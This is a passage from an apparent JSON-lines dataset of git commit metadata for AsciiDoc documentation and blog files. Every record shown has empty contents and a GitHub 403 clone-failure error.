arch,chirilo\/elasticsearch,tkssharma\/elasticsearch,ricardocerq\/elasticsearch,amit-shar\/elasticsearch,luiseduardohdbackup\/elasticsearch,tkssharma\/elasticsearch,pablocastro\/elasticsearch,wbowling\/elasticsearch,ckclark\/elasticsearch,loconsolutions\/elasticsearch,glefloch\/elasticsearch,luiseduardohdbackup\/elasticsearch,gingerwizard\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Ansh90\/elasticsearch,alexbrasetvik\/elasticsearch,strapdata\/elassandra5-rc,mnylen\/elasticsearch,zkidkid\/elasticsearch,yynil\/elasticsearch,alexkuk\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,thecocce\/elasticsearch,infusionsoft\/elasticsearch,kubum\/elasticsearch,lmtwga\/elasticsearch,rmuir\/elasticsearch,winstonewert\/elasticsearch,tebriel\/elasticsearch,Shekharrajak\/elasticsearch,elancom\/elasticsearch,shreejay\/elasticsearch,fred84\/elasticsearch,pablocastro\/elasticsearch,humandb\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,ouyangkongtong\/elasticsearch,koxa29\/elasticsearch,vietlq\/elasticsearch,elancom\/elasticsearch,ulkas\/elasticsearch,djschny\/elasticsearch,TonyChai24\/ESSource,adrianbk\/elasticsearch,trangvh\/elasticsearch,diendt\/elasticsearch,khiraiwa\/elasticsearch,xpandan\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,onegambler\/elasticsearch,iamjakob\/elasticsearch,aglne\/elasticsearch,MaineC\/elasticsearch,jango2015\/elasticsearch,TonyChai24\/ESSource,kunallimaye\/elasticsearch,iamjakob\/elasticsearch,huanzhong\/elasticsearch,hanswang\/elasticsearch,Uiho\/elasticsearch,jeteve\/elasticsearch,F0lha\/elasticsearch,mmaracic\/elasticsearch,artnowo\/elasticsearch,jpountz\/elasticsearch,andrestc\/elasticsearch,yongminxia\/elasticsearch,lzo\/elasticsearch-1,mohit\/elasticsearch,wimvds\/elasticsearch,nomoa\/elasticsearch,iantruslove\/elasticsearch,knight1128\/elasticsearch,girirajsharma\/elasticsearch,rento19962\/elasticsearch,alexbrasetvik\/elasticsearch,dylan8902\/elasticsearch,martinstuga\/elasticsearch,mrorii\/elasticsearch,KimTaehee\/elasticsearch,aglne\/elasticsearch,tahaemin\/elasticsearch,gmarz\/elasticsearch,i-am-Nathan\/elasticsearch,masterweb121\/elasticsearch,milodky\/elasticsearch,davidvgalbraith\/elasticsearch,nomoa\/elasticsearch,F0lha\/elasticsearch,khiraiwa\/elasticsearch,amaliujia\/elasticsearch,strapdata\/elassandra-test,brandonkearby\/elasticsearch,sposam\/elasticsearch,brandonkearby\/elasticsearch,mm0\/elasticsearch,jpountz\/elasticsearch,rhoml\/elasticsearch,nilabhsagar\/elasticsearch,Collaborne\/elasticsearch,mm0\/elasticsearch,markwa
lkom\/elasticsearch,amaliujia\/elasticsearch,nilabhsagar\/elasticsearch,snikch\/elasticsearch,knight1128\/elasticsearch,EasonYi\/elasticsearch,golubev\/elasticsearch,wittyameta\/elasticsearch,jprante\/elasticsearch,IanvsPoplicola\/elasticsearch,petabytedata\/elasticsearch,huypx1292\/elasticsearch,pozhidaevak\/elasticsearch,linglaiyao1314\/elasticsearch,jsgao0\/elasticsearch,polyfractal\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,dongjoon-hyun\/elasticsearch,mkis-\/elasticsearch,queirozfcom\/elasticsearch,adrianbk\/elasticsearch,smflorentino\/elasticsearch,girirajsharma\/elasticsearch,alexbrasetvik\/elasticsearch,lzo\/elasticsearch-1,skearns64\/elasticsearch,queirozfcom\/elasticsearch,jprante\/elasticsearch,cnfire\/elasticsearch-1,rajanm\/elasticsearch,obourgain\/elasticsearch,pablocastro\/elasticsearch,kevinkluge\/elasticsearch,tsohil\/elasticsearch,mohit\/elasticsearch,jbertouch\/elasticsearch,wimvds\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,slavau\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,easonC\/elasticsearch,jprante\/elasticsearch,yuy168\/elasticsearch,ImpressTV\/elasticsearch,ZTE-PaaS\/elasticsearch,Kakakakakku\/elasticsearch,Uiho\/elasticsearch,luiseduardohdbackup\/elasticsearch,gmarz\/elasticsearch,artnowo\/elasticsearch,schonfeld\/elasticsearch,xpandan\/elasticsearch,mohit\/elasticsearch,kimimj\/elasticsearch,ricardocerq\/elasticsearch,socialrank\/elasticsearch,AshishThakur\/elasticsearch,caengcjd\/elasticsearch,koxa29\/elasticsearch,a2lin\/elasticsearch,overcome\/elasticsearch,PhaedrusTheGreek\/elasticsearch,markharwood\/elasticsearch,zhiqinghuang\/elasticsearch,ESamir\/elasticsearch,rlugojr\/elasticsearch,fooljohnny\/elasticsearch,smflorentino\/elasticsearch,vietlq\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,humandb\/elasticsearch,Flipkart\/elasticsearch,zeroctu\/elasticsearch,tebriel\/elasticsearch,vingupta3\/elasticsearch,fforbeck\/elasticsearch,markllama\/elasticsearch,Fsero\/elasticsearch,18098924759\/elasticsearch,overcome\/elasticsearch,mnylen\/elasticsearch,naveenhooda2000\/elasticsearch,dataduke\/elasticsearch,likaiwalkman\/elasticsearch,nellicus\/elasticsearch,acchen97\/elasticsearch,caengcjd\/elasticsearch,MetSystem\/elasticsearch,xpandan\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,palecur\/elasticsearch,AshishThakur\/elasticsearch,smflorentino\/elasticsearch,hydro2k\/elasticsearch,hirdesh2008\/elasticsearch,NBSW\/elasticsearch,LeoYao\/elasticsearch,jsgao0\/elasticsearch,kaneshin\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,myelin\/elasticsearch,weipinghe\/elasticsearch,kaneshin\/elasticsearch,bestwpw\/elasticsearch,vietlq\/elasticsearch,markllama\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,masterweb121\/elasticsearch,humandb\/elasticsearch,dpursehouse\/elasticsearch,gfyoung\/elasticsearch,vvcephei\/elasticsearch,KimTaehee\/elasticsearch,cnfire\/elasticsearch-1,ZTE-PaaS\/elasticsearch,btiernay\/elasticsearch,IanvsPoplicola\/elasticsearch,queirozfcom\/elasticsearch,truemped\/elasticsearch,hirdesh2008\/elasticsearch,jw0201\/elastic,lchennup\/elasticsearch,coding0011\/elasticsearch,slavau\/elasticsearch,pozhidaevak\/elasticsearch,xingguang2013\/elasticsearch,petabytedata\/elasticsearch,nellicus\/elasticsearch,EasonYi\/elasticsearch,Ansh90\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,zhiqinghuang\
/elasticsearch,girirajsharma\/elasticsearch,overcome\/elasticsearch,yanjunh\/elasticsearch,HarishAtGitHub\/elasticsearch,rmuir\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,ckclark\/elasticsearch,uschindler\/elasticsearch,mbrukman\/elasticsearch,dylan8902\/elasticsearch,JervyShi\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,MetSystem\/elasticsearch,robin13\/elasticsearch,iamjakob\/elasticsearch,chirilo\/elasticsearch,AndreKR\/elasticsearch,nazarewk\/elasticsearch,kenshin233\/elasticsearch,henakamaMSFT\/elasticsearch,sreeramjayan\/elasticsearch,shreejay\/elasticsearch,mbrukman\/elasticsearch,lightslife\/elasticsearch,snikch\/elasticsearch,jw0201\/elastic,wittyameta\/elasticsearch,javachengwc\/elasticsearch,winstonewert\/elasticsearch,ivansun1010\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kubum\/elasticsearch,tebriel\/elasticsearch,camilojd\/elasticsearch,rento19962\/elasticsearch,kimimj\/elasticsearch,mbrukman\/elasticsearch,gfyoung\/elasticsearch,rmuir\/elasticsearch,davidvgalbraith\/elasticsearch,zeroctu\/elasticsearch,StefanGor\/elasticsearch,dylan8902\/elasticsearch,kingaj\/elasticsearch,kalburgimanjunath\/elasticsearch,sarwarbhuiyan\/elasticsearch,jchampion\/elasticsearch,schonfeld\/elasticsearch,knight1128\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,masterweb121\/elasticsearch,masterweb121\/elasticsearch,springning\/elasticsearch,AshishThakur\/elasticsearch,szroland\/elasticsearch,areek\/elasticsearch,szroland\/elasticsearch,luiseduardohdbackup\/elasticsearch,wenpos\/elasticsearch,pranavraman\/elasticsearch,Helen-Zhao\/elasticsearch,jaynblue\/elasticsearch,yanjunh\/elasticsearch,iantruslove\/elasticsearch,khiraiwa\/elasticsearch,cwurm\/elasticsearch,Chhunlong\/elasticsearch,vingupta3\/elasticsearch,pozhidaevak\/elasticsearch,skearns64\/elasticsearch,Widen\/elasticsearch,JackyMai\/elasticsearch,fekaputra\/elasticsearch,18098924759\/elasticsearch,nellicus\/elasticsearch,ulkas\/elasticsearch,himanshuag\/elasticsearch,tkssharma\/elasticsearch,davidvgalbraith\/elasticsearch,javachengwc\/elasticsearch,xpandan\/elasticsearch,cnfire\/elasticsearch-1,coding0011\/elasticsearch,mcku\/elasticsearch,weipinghe\/elasticsearch,socialrank\/elasticsearch,socialrank\/elasticsearch,HonzaKral\/elasticsearch,wbowling\/elasticsearch,martinstuga\/elasticsearch,abibell\/elasticsearch,mjhennig\/elasticsearch,amaliujia\/elasticsearch,iacdingping\/elasticsearch,wenpos\/elasticsearch,jsgao0\/elasticsearch,onegambler\/elasticsearch,Charlesdong\/elasticsearch,achow\/elasticsearch,i-am-Nathan\/elasticsearch,nellicus\/elasticsearch,springning\/elasticsearch,wimvds\/elasticsearch,fekaputra\/elasticsearch,henakamaMSFT\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,schonfeld\/elasticsearch,snikch\/elasticsearch,bestwpw\/elasticsearch,Flipkart\/elasticsearch,avikurapati\/elasticsearch,ESamir\/elasticsearch,mjhennig\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,kunallimaye\/elasticsearch,amaliujia\/elasticsearch,huypx1292\/elasticsearch,brandonkearby\/elasticsearch,lzo\/elasticsearch-1,JervyShi\/elasticsearch,mute\/elasticsearch,truemped\/elasticsearch,Ansh90\/elasticsearch,ivansun1010\/elasticsearch,areek\/elasticsearch,sauravmondallive\/elasticsearch,naveenhooda2000\/elasticsearch,jeteve\/elasticsearch,andrejserafim\/elasticsearch,drewr\/elasticsearch,HarishAtGitHub\/elasticsearch,trangvh\/elasticsearch,gingerwizard\/elasticsearch,Collaborne\/elasticsearch,mohit\/elasticsearch,liweinan0423\/elasticsearch,lchennup\/elasti
csearch,xuzha\/elasticsearch,rajanm\/elasticsearch,wbowling\/elasticsearch,tkssharma\/elasticsearch,umeshdangat\/elasticsearch,YosuaMichael\/elasticsearch,alexkuk\/elasticsearch,javachengwc\/elasticsearch,kubum\/elasticsearch,sauravmondallive\/elasticsearch,karthikjaps\/elasticsearch,jeteve\/elasticsearch,avikurapati\/elasticsearch,himanshuag\/elasticsearch,skearns64\/elasticsearch,vroyer\/elassandra,yynil\/elasticsearch,apepper\/elasticsearch,infusionsoft\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,mute\/elasticsearch,Rygbee\/elasticsearch,Uiho\/elasticsearch,kalburgimanjunath\/elasticsearch,fernandozhu\/elasticsearch,karthikjaps\/elasticsearch,amit-shar\/elasticsearch,vingupta3\/elasticsearch,jango2015\/elasticsearch,springning\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,lchennup\/elasticsearch,tebriel\/elasticsearch,AndreKR\/elasticsearch,shreejay\/elasticsearch,drewr\/elasticsearch,episerver\/elasticsearch,Ansh90\/elasticsearch,lightslife\/elasticsearch,LewayneNaidoo\/elasticsearch,socialrank\/elasticsearch,jbertouch\/elasticsearch,mcku\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,milodky\/elasticsearch,markharwood\/elasticsearch,iamjakob\/elasticsearch,thecocce\/elasticsearch,rento19962\/elasticsearch,mkis-\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,vvcephei\/elasticsearch,LewayneNaidoo\/elasticsearch,lmtwga\/elasticsearch,TonyChai24\/ESSource,sdauletau\/elasticsearch,onegambler\/elasticsearch,rlugojr\/elasticsearch,mm0\/elasticsearch,djschny\/elasticsearch,fernandozhu\/elasticsearch,infusionsoft\/elasticsearch,humandb\/elasticsearch,jeteve\/elasticsearch,Uiho\/elasticsearch,xingguang2013\/elasticsearch,Kakakakakku\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,amit-shar\/elasticsearch,F0lha\/elasticsearch,abibell\/elasticsearch,jimhooker2002\/elasticsearch,abibell\/elasticsearch,kcompher\/elasticsearch,Siddartha07\/elasticsearch,markharwood\/elasticsearch,SergVro\/elasticsearch,kaneshin\/elasticsearch,obourgain\/elasticsearch,jbertouch\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,tahaemin\/elasticsearch,karthikjaps\/elasticsearch,jimhooker2002\/elasticsearch,18098924759\/elasticsearch,ydsakyclguozi\/elasticsearch,Siddartha07\/elasticsearch,jimhooker2002\/elasticsearch,myelin\/elasticsearch,kalimatas\/elasticsearch,jeteve\/elasticsearch,maddin2016\/elasticsearch,easonC\/elasticsearch,jpountz\/elasticsearch,wangyuxue\/elasticsearch,Kakakakakku\/elasticsearch,sposam\/elasticsearch,Collaborne\/elasticsearch,njlawton\/elasticsearch,rento19962\/elasticsearch,knight1128\/elasticsearch,koxa29\/elasticsearch,Widen\/elasticsearch,ThalaivaStars\/OrgRepo1","old_file":"docs\/reference\/setup\/repositories.asciidoc","new_file":"docs\/reference\/setup\/repositories.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25f0c24827f9f5360bac74f1b4e34c0d4c5cf841","subject":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 
2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1ee27d0c8317723aef839c1546358b8af3428c6","subject":"y2b create post What's Hidden Inside This iPhone Case?","message":"y2b create post What's Hidden Inside This iPhone Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-26-Whats-Hidden-Inside-This-iPhone-Case.adoc","new_file":"_posts\/2016-07-26-Whats-Hidden-Inside-This-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54067289039c6c8b1bdd2664a4932d3fba27863a","subject":"fixed https:\/\/github.com\/docker\/labs\/issues\/350","message":"fixed https:\/\/github.com\/docker\/labs\/issues\/350\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6531493f610e553d262a20297f1cd8e3550acf5","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37f7ed2f410f877463343e5c1272bbf23f7a5646","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec74bf5e69db50c7ec504d114c14c7e13fdd7534","subject":"Update 2016-6-27-file-getput-contents.adoc","message":"Update 
2016-6-27-file-getput-contents.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-file-getput-contents.adoc","new_file":"_posts\/2016-6-27-file-getput-contents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec5fa9ca67164d700b4ef97b8a4cf7846200698f","subject":"dump from clbin of lecture notes cidr + layering","message":"dump from clbin of lecture notes cidr + layering","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture07_20190927.adoc","new_file":"lecture07_20190927.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e10aba1ad470eae6479a1fa6bbc14be60f224c7","subject":"Update 2017-01-23-Deprecated-annotation-in-Java-9.adoc","message":"Update 2017-01-23-Deprecated-annotation-in-Java-9.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-01-23-Deprecated-annotation-in-Java-9.adoc","new_file":"_posts\/2017-01-23-Deprecated-annotation-in-Java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5db5515c4d9327135a1c9bb05b577d114b3c8ba5","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/211","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/211\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c42459842af0c3a949068f932ad38c27cf5ce735","subject":"Publish 2015-2-10-.adoc","message":"Publish 2015-2-10-.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-.adoc","new_file":"2015-2-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8821f165b19b9ed7b8a59db04e8d96396181bbba","subject":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","message":"Update 2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_file":"_posts\/2017-10-27-Org-mode-to-HTML-yet-another-take.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b087b72007efde63930247a5046087ef607f682","subject":"Update 2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","message":"Update 2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","new_file":"_posts\/2017-12-01-Solution-to-Long-Hours-of-Sitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"906100a427c790718f9d04f091e985741871e025","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d35b4e87b61acf1022d232f0c2d659cd91f604a7","subject":"Added caffeine lrucache docs","message":"Added caffeine lrucache docs\n","repos":"tadayosi\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,christophd\/camel,adessaigne\/camel,apache\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,nikhilvibhav\/camel,gnodet\/camel,pax95\/camel,tdiesler\/camel,pmoerenhout\/camel,pax95\/camel,tdiesler\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,pmoerenhout\/camel,apache\/camel,apache\/camel,gnodet\/camel,nikhilvibhav\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,apache\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel","old_file":"components\/camel-caffeine-lrucache\/src\/main\/docs\/caffeine-lrucache.adoc","new_file":"components\/camel-caffeine-lrucache\/src\/main\/docs\/caffeine-lrucache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"69d79a40fd5262d838fe09d027b0c2425a7d55ae","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/new_one.adoc","new_file":"content\/writings\/new_one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5b3e3f59e7c793c7ea462aa826edc815b2d2aa25","subject":"Add better 
instructions around using vagrant","message":"Add better instructions around using vagrant\n","repos":"chmouel\/origin,smarterclayton\/origin,rajkotecha\/origin,lixueclaire\/origin,childsb\/origin,greyfairer\/openshift-origin,mingderwang\/origin,zofuthan\/origin,inlandsee\/origin,jdnieto\/origin,rajkotecha\/origin,fkirill\/origin,jeremyeder\/origin,linearregression\/origin,linzhaoming\/origin,fabianofranz\/origin,danwinship\/origin,PI-Victor\/origin,kargakis\/origin,burmanm\/origin,liggitt\/origin,maxamillion\/origin,smunilla\/origin,markllama\/atomic-enterprise,juanvallejo\/origin,xuant\/origin,marun\/origin,levivic\/origin,mjisyang\/origin,Jandersolutions\/origin,jeffvance\/origin,enj\/origin,anpingli\/origin,Miciah\/origin,mingderwang\/origin,legionus\/origin,detiber\/origin,juanvallejo\/origin,juanvallejo\/origin,elyscape\/origin,wyue-redhat\/origin,mnagy\/origin,jdnieto\/origin,dinhxuanvu\/origin,pacoja84\/origin,sdodson\/origin,xuant\/origin,HyunsooKim1112\/origin,Nick-Harvey\/origin,sferich888\/origin,sseago\/origin,jdnieto\/origin,dobbymoodge\/origin,janetkuo\/origin,markllama\/atomic-enterprise,miminar\/atomic-enterprise,jeremyeder\/origin,smarterclayton\/origin,lixueclaire\/origin,hingstarne\/origin,asiainfoLDP\/datafactory,spinolacastro\/origin,abutcher\/origin,StevenLudwig\/origin,grdryn\/origin,romanbartl\/origin,jwforres\/origin,allevo\/origin,burmanm\/origin,ejemba\/origin,jeremyeder\/origin,ashcrow\/origin,dkorn\/origin,mdshuai\/origin,jwhonce\/origin,allevo\/origin,rafabene\/origin,seveillac\/origin,pmorie\/origin,php-coder\/origin,pkdevbox\/origin,smarterclayton\/origin,benjaminapetersen\/origin,luciddreamz\/origin,myfear\/origin,EricMountain-1A\/openshift-origin,jpeeler\/origin,php-coder\/origin,pombredanne\/atomic-enterprise,pgmcd\/origin,wanghaoran1988\/atomic-enterprise,tagoh\/origin,jupierce\/origin,samsong8610\/origin,rhcarvalho\/origin,marsmensch\/atomic-enterprise,janetkuo\/origin,romanbartl\/origin,fabianofranz\/origin,cgwalters\/origin,cgwalters\/origin,quantiply-fork\/origin,pombredanne\/atomic-enterprise,dkorn\/origin,jprukner\/origin,mnagy\/origin,Jandersoft\/origin,tnguyen-rh\/origin,ryanj\/origin,rhcarvalho\/origin,rhuss\/origin,wyue-redhat\/origin,ryanj\/origin,ibotty\/origin,tjcunliffe\/origin,pgmcd\/origin,lixueclaire\/origin,lixueclaire\/origin,benjaminapetersen\/origin,ocsbrandon\/origin,childsb\/origin,barrett-vegas-com\/origin,maleck13\/origin,xuant\/origin,jwhonce\/origin,yarko\/origin,mnagy\/origin,burmanm\/origin,csrwng\/origin,jdnieto\/origin,ibotty\/origin,abutcher\/origin,rootfs\/origin,craigmunro\/origin,levivic\/origin,marun\/origin,simo5\/origin,jwhonce\/origin,jhadvig\/origin,goern\/origin,gesrat-cisco\/origin,jeremyeder\/origin,Miciah\/origin,mingderwang\/origin,danmcp\/origin,marsmensch\/atomic-enterprise,ocsbrandon\/origin,detiber\/origin,tjanez\/origin,HyunsooKim1112\/origin,gabemontero\/origin,dcrisan\/origin,miminar\/origin,biyiklioglu\/origin,rafabene\/origin,myfear\/origin,mrogers950\/origin,fkirill\/origin,Jandersolutions\/origin,tdawson\/origin,romanbartl\/origin,mahak\/origin,StevenLudwig\/origin,mrogers950\/origin,StevenLudwig\/origin,dustintownsend\/origin,stackdocker\/origin,rootfs\/origin,enj\/origin,benjaminapetersen\/origin,rajatchopra\/origin,spinolacastro\/origin,hingstarne\/origin,liggitt\/origin,sferich888\/origin,jsafrane\/origin,wanghaoran1988\/atomic-enterprise,mahak\/origin,gesrat-cisco\/origin,ejemba\/origin,tnguyen-rh\/origin,dkorn\/origin,thesteve0\/origin,jim-minter\/origin,thrasher-redhat\/origin,luciddreamz\/or
